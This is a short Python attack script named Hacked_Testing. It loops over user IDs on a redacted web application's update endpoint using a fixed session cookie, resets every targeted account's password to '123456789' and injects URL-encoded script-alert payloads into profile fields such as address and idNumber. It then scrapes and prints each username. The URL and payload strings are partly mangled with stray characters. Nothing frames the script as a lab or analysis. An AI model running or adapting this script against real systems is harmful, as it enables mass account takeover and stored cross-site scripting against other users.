1.
2.
3.import
requests
4.import
re
5.from
bs4
import
BeautifulSoup
6.
7.def
Hacked_Testing():
8.
for
a
in
range
(
1
,
100
):
9.
r
=
'http://xxx:port/updaXte.dXo?methXod=saXve'
10.
cookie1s
=
{
'JSESSIONID'
:
'DCBDA30F80F1DEA2X1123C8080FBE'
,
11.
'submenuheader'
:
'-1c'
}
12.
datas
=
{
13.
'id'
:a,
14.
'password'
:
'123456789'
,
15.
'repassword'
:
'123456789'
,
16.
'stuNo'
:
'200107'
,
17.
'realName'
:
'%E4%B1231%A3'
,
18.
'sex'
:
'1'
,
19.
'schollTime'
:
'2019-03-08'
,
20.
'tel'
:
'%3Cscr23rt123t%3E'
,
21.
'address'
:
'%3Cscript%3E1alert%281%23script%3E'
,
22.
'birthPlace'
:
'%3Cscrip123Fscript%3E'
,
23.
'idNumber'
:
'%3Cscript%3Eale123C%2Fscript%3E'
,
24.
'head_img'
:
'%2Fuploadfiles1%123lt_head.gif'
,
25.
'x='
:
'50'
,
26.
'y'
:
'6'
27.
}
28.
result
=
requests.post(url
=
r, cookies
=
cookie1s, data
=
datas)
29.
soup
=
BeautifulSoup(result.text, features
=
"html.parser"
)
30.
print
(
'[+]Current ID is:{},UserName is:{}'
.
format
(a, soup.td.text))
31.Hacked_Testing
()